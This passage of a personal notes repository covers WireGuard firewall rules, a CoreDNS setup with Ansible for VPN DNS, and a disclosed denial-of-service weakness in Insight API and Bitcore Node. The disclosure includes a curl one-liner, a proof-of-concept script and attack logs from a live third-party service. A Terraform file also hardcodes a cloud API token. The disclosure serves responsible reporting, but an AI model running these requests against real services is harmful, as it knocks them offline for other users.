Drop rest 11 | - iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 12 | 13 | - ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 14 | - ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 15 | - ip6tables -A INPUT -i eth0 -j DROP # Drop rest 16 | - ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 17 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | description = "Hetzner Cloud API Token" 4 | 5 | default = "A2fMl7W5Q7aN5J4pZcmFMOuKjRKNvPaBbH4VLBkuC1Cn5aVbLCEyikt2XFhB3wiC" 6 | } 7 | 8 | variable "ssh_keys" { 9 | type = map(string) 10 | description = "Map of SSH Keys on servers by default, name => key" 11 | 12 | default = { 13 | "Kirill Fomichev" = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru" 14 | } 15 | } 16 | 17 | variable "wireguard_server" { 18 | type = map(string) 19 | description = "Map options for WireGuard Server" 20 | 21 | default = { 22 | image = "ubuntu-18.04" 23 | server_type = "cx11-ceph" 24 | datacenter = "nbg1-dc3" 25 | } 26 | } 27 | 28 | variable "test_pool_size" { 29 | type = number 30 | description = "Pool Size of test nodes" 31 | 32 | default = 2 33 | } 34 | 35 | variable "test_pool_server" { 36 | type = map(string) 37 | description = "Map options for Servers from Test Pool" 38 | 39 | default = { 40 | image = "ubuntu-18.04" 41 | server_type = "cx11-ceph" 42 | datacenter = "nbg1-dc3" 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/README.md: -------------------------------------------------------------------------------- 1 | # Own DNS in VPN 2 | 3 | ### DNS 4 | 5 | Why do we need DNS in our VPN? Well, if we have one service we can easily remember (or note down) its IP address and use it. Moreover, because we can assign the IP ourselves, it can be persistent. But what if we have a dozen services, a few users, and services can change their IPs? What if we want simple DNS-based load balancing for our services? All this can be solved with our own DNS service. 6 | 7 | In this note I'll show how to do this with [CoreDNS](https://coredns.io/). Why CoreDNS? Because the configuration is very simple, the project is supported by the [CNCF](https://www.cncf.io/), and it is used by default in [Kubernetes](https://kubernetes.io/). 8 | 9 | ### Secure tunnel 10 | 11 | [WireGuard](https://www.wireguard.com/) will be used as the secure tunnel into our VPN; you should set it up as described in the guide: [WireGuard setup guide](../2019-07-28-wireguard-setup-guide). 12 | 13 | ### CoreDNS on server 14 | 15 | For automated installation and configuration of CoreDNS on the server I created 2 [Ansible](https://www.ansible.com/) roles: 16 | 17 | ```bash 18 | ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook ./coredns-install.yml ./coredns-config.yml -e 'target=dns coredns=1.6.1 coredns_profile=default' 19 | ``` 20 | 21 | What do these roles do?
22 | 23 | - [coredns-install](ansible/roles/coredns-install) 24 | 25 | - install the required CoreDNS version (if `latest` is set, the role downloads the latest release) 26 | - disable port `53` binding by `systemd-resolved` in `/etc/systemd/resolved.conf` and restart `systemd-resolved` 27 | - create user `coredns` 28 | - upload the [CoreDNS config](ansible/roles/coredns-install/files/Corefile) to `/etc/coredns/Corefile` 29 | - upload the [system resolve](ansible/roles/coredns-install/files/resolv.conf) config to `/etc/resolv.conf` 30 | - upload the [unit file](ansible/roles/coredns-install/files/coredns.service) for the systemd service to `/etc/systemd/system` (see [coredns/deployment:systemd](https://github.com/coredns/deployment/tree/master/systemd)) 31 | - start and enable the coredns service if CoreDNS was installed 32 | - restart the coredns service if CoreDNS was updated 33 | 34 | What does the uploaded Corefile include? 35 | 36 | - [errors](https://coredns.io/plugins/errors/) 37 | - [forward](https://coredns.io/plugins/forward/) (to `213.133.100.100 213.133.98.98 213.133.99.99`, see [Hetzner DNS](https://wiki.hetzner.de/index.php/Hetzner_Standard_Name_Server/en)) 38 | - [cache](https://coredns.io/plugins/cache/) 39 | - [loop](https://coredns.io/plugins/loop/) 40 | - [reload](https://coredns.io/plugins/reload/) with the minimal available reload interval of 2s 41 | 42 | - [coredns-config](ansible/roles/coredns-config) 43 | 44 | - upload the selected CoreDNS profile and its files 45 | 46 | I also added the zone `example.com` to the default profile for demonstration. 47 | 48 | ### Local setup 49 | 50 | Now our DNS service is working and we can check it, with `dig` for example: 51 | 52 | ```bash 53 | $ dig +nocmd @116.203.89.18 -p 53 a.example.com +noall +answer 54 | a.example.com. 5 IN A 10.0.3.1 55 | ``` 56 | 57 | And if the `log` plugin is set in your config, you can see the logs by typing `journalctl -feu coredns` on `10.0.2.1`: 58 | 59 | ```bash 60 | 2019-08-02T16:47:04.525+02:00 [INFO] 78.81.187.109:35894 - 26238 "A IN a.example.com. udp 54 false 4096" NOERROR qr,aa,rd 60 0.000212109s 61 | ``` 62 | 63 | But we should configure DNS locally so that our DNS in the VPN is used only for the domain `example.com`. It's not right if everything (or more than required) is resolved through the DNS in our VPN, because in that case you disclose everything you visit to anybody with read access to the logs of that DNS server. 64 | 65 | If you use [NetworkManager](https://wiki.gnome.org/Projects/NetworkManager) you should disable its DNS handling. For this, add the next 3 options to the `[main]` section of the NetworkManager config, located at `/etc/NetworkManager/NetworkManager.conf`: 66 | 67 | ```ini 68 | [main] 69 | dns=none 70 | rc-manager=unmanaged 71 | systemd-resolved=false 72 | ``` 73 | 74 | Then restart NetworkManager: `systemctl restart NetworkManager`. 75 | 76 | Next, we need to make sure that all DNS requests go through the [systemd-resolved](https://www.freedesktop.org/software/systemd/man/systemd-resolved.service.html) service.
For this, we should make `/etc/resolv.conf` a symlink pointing to the stub file from `systemd-resolved`: 77 | 78 | ```bash 79 | ln -sf /run/systemd/resolve/stub-resolv.conf /etc/resolv.conf 80 | ``` 81 | 82 | Now we should change the `PostUp` command in our WireGuard config to configure `systemd-resolved`: 83 | 84 | ```bash 85 | PostUp = wg set %i private-key <(cat /etc/wireguard/%i.conf.privatekey) && resolvectl dnssec %i no && resolvectl domain %i ~example.com && resolvectl dns %i 10.0.2.1 86 | ``` 87 | 88 | Here we disable DNSSEC, set the domain for name resolution, and set the address of our DNS server. These commands are described in the man page for [resolvectl](https://www.freedesktop.org/software/systemd/man/resolvectl.html). 89 | 90 | Now only `example.com` (and its subdomains) will be resolved through `10.0.2.1`; everything else will be resolved through the DNS servers set in `systemd-resolved` by default or by you. 91 | 92 | \* If you want DNSSEC support, you need to add the [dnssec](https://coredns.io/plugins/dnssec/) plugin to the CoreDNS config and generate keys for the zone, but this is not really required since DNS traffic to our server already goes through a secure tunnel. 93 | 94 | ### Default DNS in systemd-resolved 95 | 96 | By default `systemd-resolved` has `FallbackDNS` set to `8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844`. If you want to set your own default DNS, you need to: 97 | 98 | - Set a value for `DNS` in `/etc/systemd/resolved.conf` 99 | - Restart `systemd-resolved`: `systemctl restart systemd-resolved.service` 100 | 101 | Option descriptions on [freedesktop.org](https://www.freedesktop.org): https://www.freedesktop.org/software/systemd/man/resolved.conf.html 102 | 103 | ### Possible future topics 104 | 105 | - High Availability with [etcd](https://etcd.io/) 106 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | forks = 10 3 | interpreter_python = /usr/bin/python 4 | 5 | # default user to use for playbooks if user is not specified 6 | # (/usr/bin/ansible will use current user as default) 7 | remote_user = root 8 | 9 | # retry files 10 | # When a playbook fails by default a .retry file will be created in ~/ 11 | # You can disable this feature by setting retry_files_enabled to False 12 | # and you can change the location of the files by setting retry_files_save_path 13 | retry_files_enabled = False 14 | 15 | [inventory] 16 | # enable inventory plugins, default: 'host_list', 'script', 'yaml', 'ini', 'auto' 17 | enable_plugins = yaml, host_list 18 | 19 | [ssh_connection] 20 | 21 | # ssh arguments to use 22 | # Leaving off ControlPersist will result in poor performance, so use 23 | # paramiko on older platforms rather than removing it, -C controls compression use 24 | ssh_args = -C -o ControlMaster=auto -o ControlPersist=60s -o PreferredAuthentications=publickey 25 | 26 | # Enabling pipelining reduces the number of SSH operations required to 27 | # execute a module on the remote server. This can result in a significant 28 | # performance improvement when enabled, however when using "sudo:" you must 29 | # first disable 'requiretty' in /etc/sudoers 30 | # 31 | # By default, this option is disabled to preserve compatibility with 32 | # sudoers configurations that have requiretty (the default on many distros).
33 | # 34 | pipelining = True 35 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/coredns-config.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: coredns-config 6 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/coredns-install.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: coredns-install 6 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/inventory/hosts.yml: -------------------------------------------------------------------------------- 1 | --- 2 | all: 3 | children: 4 | dns: 5 | hosts: 6 | 10.0.2.1: 7 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/README.md: -------------------------------------------------------------------------------- 1 | ## coredns-config 2 | 3 | Upload the CoreDNS config and required files. 4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i 'root@X.X.X.X,' ./coredns-config.yml -e 'target=all coredns_profile=default' 9 | ``` 10 | 11 | `coredns_profile` is `default` by default. 12 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/defaults/main.yml: -------------------------------------------------------------------------------- 1 | coredns_profile: default 2 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/files/default/Corefile: -------------------------------------------------------------------------------- 1 | . { 2 | errors 3 | file /etc/coredns/db.example.com example.com { 4 | reload 1s 5 | } 6 | forward . 213.133.100.100 213.133.98.98 213.133.99.99 7 | cache 8 | loop 9 | reload 2s # 30s default, 2s min 10 | } 11 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/files/default/db.example.com: -------------------------------------------------------------------------------- 1 | example.com. IN SOA dns.example.com. dns.example.com. 1564497611 2h 30m 1d 30 2 | a.example.com. IN A 10.0.3.1 3 | b.example.com. IN CNAME a.example.com. 4 | c.example.com. IN A 10.0.3.3 5 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | - name: upload files 4 | copy: 5 | src: "files/{{ coredns_profile }}/" 6 | dest: /etc/coredns/ 7 | owner: root 8 | group: root 9 | mode: 0644 10 | 11 | become: true 12 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/README.md: -------------------------------------------------------------------------------- 1 | ## coredns-install 2 | 3 | Install [CoreDNS](https://coredns.io/), create a simple config and run it as a systemd service.
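Once the role has finished, a quick sanity check can be run on the host itself (the uploaded `resolv.conf` points at `127.0.0.1`, so local resolution should already go through CoreDNS; assumes `dig` is available there):

```bash
# service state plus a test query against the local CoreDNS
systemctl status coredns --no-pager
dig @127.0.0.1 +short example.org
```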
4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i 'root@X.X.X.X,' ./coredns-install.yml -e 'target=all coredns=1.6.1' 9 | ``` 10 | 11 | It's possible to set `coredns` to `latest`; in this case the latest available release will be downloaded. 12 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/files/Corefile: -------------------------------------------------------------------------------- 1 | . { 2 | errors 3 | forward . 213.133.100.100 213.133.98.98 213.133.99.99 4 | cache 5 | loop 6 | reload 2s # 30s default, 2s min 7 | } 8 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/files/coredns.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=CoreDNS DNS server 3 | Documentation=https://coredns.io 4 | After=network.target 5 | 6 | [Service] 7 | PermissionsStartOnly=true 8 | LimitNOFILE=1048576 9 | LimitNPROC=512 10 | CapabilityBoundingSet=CAP_NET_BIND_SERVICE 11 | AmbientCapabilities=CAP_NET_BIND_SERVICE 12 | NoNewPrivileges=true 13 | User=coredns 14 | WorkingDirectory=~ 15 | ExecStart=/usr/local/bin/coredns -conf=/etc/coredns/Corefile 16 | ExecReload=/bin/kill -SIGUSR1 $MAINPID 17 | Restart=on-failure 18 | 19 | [Install] 20 | WantedBy=multi-user.target 21 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/files/resolv.conf: -------------------------------------------------------------------------------- 1 | # CoreDNS 2 | nameserver 127.0.0.1 3 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | - name: install curl 4 | apt: 5 | name: 6 | - curl 7 | state: present 8 | cache_valid_time: 86400 9 | 10 | - name: install or update CoreDNS 11 | shell: | 12 | TAG={{ coredns }} 13 | if [ "$TAG" == "latest" ]; then 14 | TAG=$(curl "https://api.github.com/repos/coredns/coredns/releases/latest" | grep -Po '"tag_name": "v\K.*?(?=")') 15 | fi 16 | 17 | CURRENT=$(which coredns > /dev/null && /usr/local/bin/coredns --version | grep -Po '^CoreDNS-\K.*$') 18 | if [ "$CURRENT" != "$TAG" ]; then 19 | curl --location --silent --output - https://github.com/coredns/coredns/releases/download/v$TAG/coredns_$TAG\_linux_amd64.tgz | tar -zxO > /usr/local/bin/coredns-$TAG 20 | chmod +x /usr/local/bin/coredns-$TAG 21 | ln -sf coredns-$TAG /usr/local/bin/coredns 22 | rm -f /usr/local/bin/coredns-$CURRENT 23 | 24 | if [ "$CURRENT" == "" ]; then 25 | mkdir -p /etc/coredns/ 26 | echo installed 27 | else 28 | echo updated 29 | fi 30 | fi 31 | args: 32 | executable: /bin/bash 33 | register: coredns_bin 34 | changed_when: coredns_bin.stdout in ["installed", "updated"] 35 | 36 | - name: disable systemd-resolved port binding 37 | shell: | 38 | perl -pe 's/^DNSStubListener=(?!no)/#DNSStubListener=/g' -i /etc/systemd/resolved.conf 39 | perl -pe 's/^#DNSStubListener=no$/DNSStubListener=no/g' -i /etc/systemd/resolved.conf 40 | if ! 
grep -q '^DNSStubListener=no$' /etc/systemd/resolved.conf; then 41 | echo 'DNSStubListener=no' >> /etc/systemd/resolved.conf 42 | fi 43 | systemctl restart systemd-resolved.service 44 | when: coredns_bin.stdout == "installed" 45 | 46 | - name: create user `coredns` 47 | user: 48 | name: coredns 49 | home: /var/lib/coredns 50 | comment: CoreDNS is a DNS server that chains plugins 51 | when: coredns_bin.stdout == "installed" 52 | 53 | - name: upload files 54 | copy: 55 | src: "files/{{ item.name }}" 56 | dest: "{{ item.dest }}/{{ item.name }}" 57 | owner: root 58 | group: root 59 | mode: 0644 60 | with_items: 61 | - { name: "Corefile", dest: "/etc/coredns" } 62 | - { name: "resolv.conf", dest: "/etc" } 63 | - { name: "coredns.service", dest: "/etc/systemd/system" } 64 | when: coredns_bin.stdout == "installed" 65 | 66 | - name: activate coredns 67 | systemd: 68 | name: coredns 69 | state: started 70 | enabled: True 71 | daemon_reload: True 72 | when: coredns_bin.stdout == "installed" 73 | 74 | - name: restart coredns 75 | systemd: 76 | name: coredns 77 | state: restarted 78 | when: coredns_bin.stdout == "updated" 79 | 80 | become: true 81 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/README.md: -------------------------------------------------------------------------------- 1 | # Possible DoS of Insight 2 | 3 | ### Insight 4 | 5 | What is it? [Insight](https://insight.is/) is a bitcoin blockchain explorer and API provider. Insight has since been replaced by [Bitcore Node](https://github.com/bitpay/bitcore/blob/master/packages/bitcore-node), but I'll talk about [Insight API v0.4.3](https://github.com/bitpay/insight-api/tree/v0.4.3). This was the last release before [BitPay](https://bitpay.com/) started rewriting it, and the changes are not clear; there were a few betas (you can find a v5 beta in the GitHub tags), and later they produced `Bitcore Node` instead of Insight. But `v0.4.3` is still widely used by bitcoin forks. 6 | 7 | ### Idea 8 | 9 | Once, while going through the source code of [insight-api](https://github.com/bitpay/insight-api/tree/v0.4.3), I realized that the service can be hung up if anybody sends a very big, invalid address in a POST request to `/insight-api/addrs/utxo`. Why? Well, I knew that [Base 58](https://en.bitcoin.it/wiki/Base58Check_encoding) decoding is slow for big strings/buffers in JavaScript. I created a small tool ([bs58-time-chart](./bs58-time-chart/bs58-time.js)) which shows how decoding time depends on input length; take a look: 10 | 11 | ![](./bs58-time-chart/bs58-time.png) 12 | 13 | For a 100KB payload we need \~10 seconds. This means that if we send such a payload to the service and the service tries to decode it without length validation, everything else is delayed for the whole decoding time. Why? Because JavaScript is single-threaded. 14 | 15 | UTXO method: https://github.com/bitpay/insight-api/blob/v0.4.3/lib/index.js#L204 16 | 17 | `checkAddrs` middleware: https://github.com/bitpay/insight-api/blob/v0.4.3/lib/addresses.js#L92-L100 18 | 19 | Address validation: https://github.com/bitpay/insight-api/blob/v0.4.3/lib/addresses.js#L112-L119 20 | 21 | Base58 decode in Address constructor: https://github.com/bitpay/bitcore-lib/blob/v0.16.0/lib/address.js#L288 22 | 23 | ### PoC 24 | 25 | The demonstration tool is placed in [./insight-api-dos](./insight-api-dos): 26 | 27 | ```bash 28 | node insight-dos.js 29 | ``` 30 | 31 | It's not clear why exactly this doesn't work against [https://insight.bitpay.com/](https://insight.bitpay.com/); maybe it's not `v0.4.3` there anymore? 
But it still works on some Insight instances; example output for [https://ravencoin.network](https://ravencoin.network): 32 | 33 | ```bash 34 | 2019-08-04T08:32:30.160Z Start DoS call id#1 35 | 2019-08-04T08:32:30.526Z Best hash: 00000000000029ba2ac2f3a493ec69d8e66ba027dfd6f653a36a369525882cc8 (382.94ms) 36 | 2019-08-04T08:32:36.296Z Best hash: Timeout (3149.32ms) 37 | 2019-08-04T08:32:39.536Z Best hash: Timeout (3140.85ms) 38 | 2019-08-04T08:32:42.778Z Best hash: Timeout (3141.18ms) 39 | 2019-08-04T08:32:46.036Z Best hash: Timeout (3155.93ms) 40 | 2019-08-04T08:32:47.669Z DoS call id#1 error: Bad Request 41 | 2019-08-04T08:32:47.669Z DoS call id#1 done in 17507.44ms 42 | 2019-08-04T08:32:47.971Z Best hash: 00000000000029ba2ac2f3a493ec69d8e66ba027dfd6f653a36a369525882cc8 (1835.51ms) 43 | 2019-08-04T08:32:48.279Z Best hash: 00000000000029ba2ac2f3a493ec69d8e66ba027dfd6f653a36a369525882cc8 (307.77ms) 44 | ``` 45 | 46 | I.e., one call stopped all other requests for \~17s. 47 | 48 | If you want to generate your own Base58 input: `node gen-post-body.js` 49 | 50 | ## Bitcore Node 51 | 52 | The [current Bitcore Node](https://github.com/bitpay/bitcore/blob/v8.2.0/packages/bitcore-node/docs/api-documentation.md) code does not implement POST methods that expect Base58-encoded data, so it's fair to say this was fixed, in a way :) 53 | 54 | But `Bitcore Node` introduced an interesting thing: the `Public Key` API. Unfortunately, strict validation was ignored again. 55 | 56 | The first issue is that you can add addresses that are not related to the Public Key. This way we can add arbitrary addresses and then call the `balance` method, which is an aggregation. As a demonstration I created a small script ([./bitcore-node-pubkey/index.js](./bitcore-node-pubkey/index.js)) which adds the top 10k addresses by UTXO count to the specified wallet and later asks for the balance. The address import process is a little weird, so after waiting a few minutes you will probably need to kill the process, comment out the `walletImportAddresses` function call, and run it again. In the end [Cloudflare](https://www.cloudflare.com/) returns HTTP code `520`. While this doesn't look like something that kills the service, it should make the database much slower. 57 | 58 | The second issue is that huge strings are allowed as arguments (100MB, hardcoded (!) [source](https://github.com/bitpay/bitcore/blob/v8.2.0/packages/bitcore-node/src/routes/index.ts#L10-L20)). I was able to create a wallet record with a wallet name of 10MiB. With the default rate limit it's possible to send such a request every second, which gives a ~843GiB (10 * 60 * 60 * 24 / 1024) database size increase in 24 hours. What if the data is sent from 100 addresses; how soon will the service go down? 59 | 60 | After I reported this to BitPay, they fixed part of it: [bitpay/bitcore/pull/2310](https://github.com/bitpay/bitcore/pull/2310), [bitpay/bitcore/pull/2313](https://github.com/bitpay/bitcore/pull/2313), [bitpay/bitcore/pull/2314](https://github.com/bitpay/bitcore/pull/2314).
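For reference, the original v0.4.3 attack needs nothing more than the shell (a hedged sketch of what `gen-post-body.js` / `insight-dos.js` do; the host is a placeholder, and `addrs` is assumed to be the field read by the `checkAddrs` middleware linked above):

```bash
# craft a ~100 KB run of valid base58 characters posing as a single "address"
ADDR=$(printf '1%.0s' $(seq 1 100000))

# while the server base58-decodes it, the Node.js event loop is blocked,
# so every other request to the service stalls until decoding finishes
curl -s -X POST -H 'Content-Type: application/json' \
  -d "{\"addrs\":\"$ADDR\"}" \
  https://insight.example.com/insight-api/addrs/utxo
```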
61 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bitcore-node-pubkey/index.js: -------------------------------------------------------------------------------- 1 | const crypto = require('crypto') 2 | const fs = require('fs') 3 | const path = require('path') 4 | const https = require('https') 5 | const { URL } = require('url') 6 | const secp256k1 = require('secp256k1') 7 | 8 | const baseUrl = 'https://api.bitcore.io/api/BTC/mainnet' 9 | const privateKey = Buffer.from('4f79da18f3f552bd0e8c16bc5dbe797293d12bf38fad74a9595d565d80049518', 'hex') 10 | const publicKey = secp256k1.publicKeyCreate(privateKey) 11 | 12 | const utxoAddresses = fs.readFileSync(path.join(__dirname, 'utxo-stats'), 'utf-8').split('\n').map((x) => x.split(' ')[1]).filter((x) => x) 13 | 14 | async function makeRequest (url, opts, data) { 15 | return new Promise((resolve, reject) => { 16 | const req = https.request(url, opts) 17 | req.on('error', reject) 18 | req.on('timeout', () => { 19 | req.abort() 20 | reject(new Error('Timeout error')) 21 | }) 22 | req.on('response', (resp) => { 23 | console.log(`${resp.statusCode}: ${resp.statusMessage}`) 24 | if (resp.statusCode !== 200) { 25 | // return reject(new Error(`${resp.statusCode}: ${resp.statusMessage}`)) 26 | } 27 | 28 | const chunks = [] 29 | resp.on('data', (chunk) => chunks.push(chunk)) 30 | resp.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) 31 | }) 32 | 33 | req.end(data) 34 | }) 35 | } 36 | 37 | function sha256x2 (buffer) { 38 | buffer = crypto.createHash('sha256').update(buffer).digest() 39 | return crypto.createHash('sha256').update(buffer).digest() 40 | } 41 | 42 | function getSignature (url, method, body = JSON.stringify({})) { 43 | const parsedUrl = new URL(url) 44 | const msg = [method, parsedUrl.pathname + parsedUrl.search, body].join('|') 45 | const msgHash = sha256x2(Buffer.from(msg)) 46 | return secp256k1.sign(msgHash, privateKey).signature.toString('hex') 47 | } 48 | 49 | async function walletCallGetMethod (method) { 50 | const url = `${baseUrl}/wallet/${publicKey.toString('hex')}${method}` 51 | const headers = { 'Content-Type': 'application/json', 'x-signature': getSignature(url, 'GET') } 52 | return makeRequest(url, { headers }) 53 | } 54 | 55 | async function walletCreate () { 56 | const headers = { 'Content-Type': 'application/json' } 57 | const body = JSON.stringify({ 58 | name: 'PubKey Tests', 59 | pubKey: publicKey.toString('hex'), 60 | path: "m/44'/0'/0'" 61 | }) 62 | const data = await makeRequest(`${baseUrl}/wallet/`, { method: 'POST', headers }, body) 63 | return data === 'Wallet already exists' ? data : `Wallet created, id: ${JSON.parse(data)._id}` 64 | } 65 | 66 | async function walletImportAddresses (addresses) { 67 | const url = `${baseUrl}/wallet/${publicKey.toString('hex')}` 68 | const body = JSON.stringify(addresses.map((address) => ({ address }))) 69 | const headers = { 'Content-Type': 'application/octet-stream', 'x-signature': getSignature(url, 'POST', body) } 70 | return await makeRequest(url, { method: 'POST', headers }, body) 71 | } 72 | 73 | ;(async () => { 74 | // console.log(await walletCreate()) 75 | // console.log(await walletCallGetMethod('')) 76 | console.log(await walletCallGetMethod('/check')) 77 | console.log(await walletImportAddresses(utxoAddresses)) 78 | console.log(await walletCallGetMethod('/balance')) 79 | // console.log(await walletCallGetMethod('/addresses')) // not deployed end? 
80 | })().catch((err) => { 81 | console.error(err.stack || err) 82 | process.exit(1) 83 | }) 84 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bitcore-node-pubkey/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "secp256k1": "^3.7.1" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bitcore-node-pubkey/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 2 | # yarn lockfile v1 3 | 4 | 5 | bindings@^1.5.0: 6 | version "1.5.0" 7 | resolved "https://registry.yarnpkg.com/bindings/-/bindings-1.5.0.tgz#10353c9e945334bc0511a6d90b38fbc7c9c504df" 8 | integrity sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ== 9 | dependencies: 10 | file-uri-to-path "1.0.0" 11 | 12 | bip66@^1.1.5: 13 | version "1.1.5" 14 | resolved "https://registry.yarnpkg.com/bip66/-/bip66-1.1.5.tgz#01fa8748785ca70955d5011217d1b3139969ca22" 15 | integrity sha1-AfqHSHhcpwlV1QESF9GzE5lpyiI= 16 | dependencies: 17 | safe-buffer "^5.0.1" 18 | 19 | bn.js@^4.11.8, bn.js@^4.4.0: 20 | version "4.11.8" 21 | resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f" 22 | integrity sha512-ItfYfPLkWHUjckQCk8xC+LwxgK8NYcXywGigJgSwOP8Y2iyWT4f2vsZnoOXTTbo+o5yXmIUJ4gn5538SO5S3gA== 23 | 24 | brorand@^1.0.1: 25 | version "1.1.0" 26 | resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f" 27 | integrity sha1-EsJe/kCkXjwyPrhnWgoM5XsiNx8= 28 | 29 | browserify-aes@^1.0.6: 30 | version "1.2.0" 31 | resolved "https://registry.yarnpkg.com/browserify-aes/-/browserify-aes-1.2.0.tgz#326734642f403dabc3003209853bb70ad428ef48" 32 | integrity sha512-+7CHXqGuspUn/Sl5aO7Ea0xWGAtETPXNSAjHo48JfLdPWcMng33Xe4znFvQweqc/uzk5zSOI3H52CYnjCfb5hA== 33 | dependencies: 34 | buffer-xor "^1.0.3" 35 | cipher-base "^1.0.0" 36 | create-hash "^1.1.0" 37 | evp_bytestokey "^1.0.3" 38 | inherits "^2.0.1" 39 | safe-buffer "^5.0.1" 40 | 41 | buffer-xor@^1.0.3: 42 | version "1.0.3" 43 | resolved "https://registry.yarnpkg.com/buffer-xor/-/buffer-xor-1.0.3.tgz#26e61ed1422fb70dd42e6e36729ed51d855fe8d9" 44 | integrity sha1-JuYe0UIvtw3ULm42cp7VHYVf6Nk= 45 | 46 | cipher-base@^1.0.0, cipher-base@^1.0.1, cipher-base@^1.0.3: 47 | version "1.0.4" 48 | resolved "https://registry.yarnpkg.com/cipher-base/-/cipher-base-1.0.4.tgz#8760e4ecc272f4c363532f926d874aae2c1397de" 49 | integrity sha512-Kkht5ye6ZGmwv40uUDZztayT2ThLQGfnj/T71N/XzeZeo3nf8foyW7zGTsPYkEya3m5f3cAypH+qe7YOrM1U2Q== 50 | dependencies: 51 | inherits "^2.0.1" 52 | safe-buffer "^5.0.1" 53 | 54 | create-hash@^1.1.0, create-hash@^1.1.2, create-hash@^1.2.0: 55 | version "1.2.0" 56 | resolved "https://registry.yarnpkg.com/create-hash/-/create-hash-1.2.0.tgz#889078af11a63756bcfb59bd221996be3a9ef196" 57 | integrity sha512-z00bCGNHDG8mHAkP7CtT1qVu+bFQUPjYq/4Iv3C3kWjTFV10zIjfSoeqXo9Asws8gwSHDGj/hl2u4OGIjapeCg== 58 | dependencies: 59 | cipher-base "^1.0.1" 60 | inherits "^2.0.1" 61 | md5.js "^1.3.4" 62 | ripemd160 "^2.0.1" 63 | sha.js "^2.4.0" 64 | 65 | create-hmac@^1.1.4: 66 | version "1.1.7" 67 | resolved "https://registry.yarnpkg.com/create-hmac/-/create-hmac-1.1.7.tgz#69170c78b3ab957147b2b8b04572e47ead2243ff" 68 | integrity 
